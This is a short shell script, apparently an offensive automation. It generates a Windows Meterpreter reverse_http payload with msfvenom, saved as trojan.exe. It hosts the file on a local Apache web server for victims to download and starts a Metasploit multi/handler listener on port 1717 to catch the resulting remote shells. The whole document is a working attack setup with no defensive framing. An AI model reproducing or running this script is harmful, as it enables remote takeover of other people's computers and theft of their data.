touch backdoor.rc
echo "msfvenom -p windows/x64/meterpreter/reverse_http lhost=$(hostname -I) lport=1717 -f exe -o trojan.exe" >> backdoor.rc
echo mv trojan.exe /var/www/html/ >> backdoor.rc
echo service apache2 start >> backdoor.rc
echo msfconsole -r metasploit.rc >> backdoor.rc
chmod +x backdoor.rc

touch metasploit.rc
echo use multi/handler >> metasploit.rc
echo set payload windows/x64/meterpreter/reverse_http >>metasploit.rc
echo "set lhost $(hostname -I)" >> metasploit.rc
echo set lport 1717 >> metasploit.rc
echo run >> metasploit.rc

./backdoor.rc
